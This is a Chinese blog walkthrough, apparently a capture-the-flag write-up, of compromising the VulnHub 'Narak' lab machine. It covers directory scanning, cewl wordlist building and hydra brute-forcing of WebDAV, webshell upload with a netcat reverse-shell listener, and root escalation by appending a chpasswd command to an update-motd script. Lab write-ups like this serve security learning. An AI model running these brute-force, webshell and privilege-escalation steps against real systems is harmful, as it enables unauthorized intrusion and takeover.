[Vulnhub] narak

目录

前言

信息搜集

监听 反弹shell

 Motd提权


前言

靶机下载链接:HA: Narak ~ VulnHub

描述

纳拉克在印度教中相当于地狱。 你和地狱之主本人在坑里。 你能用你的黑客技能摆脱纳拉克吗? 燃烧的墙壁和恶魔无处不在,即使您值得信赖的工具也会在此任务中背叛您。 没有人相信。 只要记住逃脱Narak“枚举”的终极咒语。 在获得根之后,您确实会同意“地狱不是一个糟糕的地方”。

目标:two flag file(user.txt 和 root.txt)

信息搜集

由于靶机和kali在同一网段,打开kali,通过nmap进行主机发现

kali:192.168.236.128

 靶机ip为:192.168.236.131 访问试试

 只得到一堆图片,没有可用信息,

dirb-基于字典的目录扫描工具

dirb扫一下目录

使用方法:dirb http://192.168.236.131

 webdav是web上的一个服务,kali自带的cadaver能够连接webdav

 cadaver-----webdav客户端使用

cadaver http://192.168.236.131/webdav   //连接

连接之后

put webshell.php //上传🐎

 但是我们不知道账号密码,下又要用到我们的cewl工具

cewl ---- 爬行网站创建密码字典

使用方法:cewl 192.168.236.131 -w 1.txt

 

 执行后得到了 1.txt文件。有了密码字典后,对其进行爆破,又用到了Hydra爆破神器

Hydra ---- 爆破神器

        hydra是一个自动化的爆破工具,暴力破解密码,是一个支持众多协议的爆破工具,已经集成到kali中,可直接用。

使用方法:hydra -L 1.txt -P 1.txt 192.168.236.131 http-get /webdav

(-L 指定用户名 -P 指定密码 http-get 请求方式)

 得到了用户名:yamdoot 密码:Swarg

监听 反弹shell

cadaver http://靶机   连接webdav

上传webshell.php  路径为:/webdav/webshell.php

 之后关掉再开一个,nc监听 4444端口

nc -lvvp 4444

然后使用之前爆破的用户密码登录webdav,接着查看监听情况

监听成功,成功回弹webshell

优化命令执行终端,执行下面命令进入python交互式:

python3 -c 'import pty;pty.spawn("/bin/bash");'

 查看根目录下文件,发现了可疑 mnt 目录

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

解码网站:https://www.splitbrain.org/services/ook

得到一组brainfuck编码,解码后得到:

chitragupt

在home目录下发现了 inferno,narak用户  估计是他们的用户密码

ssh连接登录inferno试试 登录成功!!

在user.txt中发现了一个flag。

 Motd提权

两个flag文件,user.txt已得到,剩下root.txt 需要我们提权。

修改文件 /etc/update-motd.d/00-header
1.进入到文件夹 /etc/update-motd.d/
2.修改文件 echo "echo 'root:admin'|sudo chpasswd">>00-header
3.重新登录
4. 切换管理员

 之后 su root切换管理员权限时,密码就是admin。 在/root目录下得到第二个flag。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值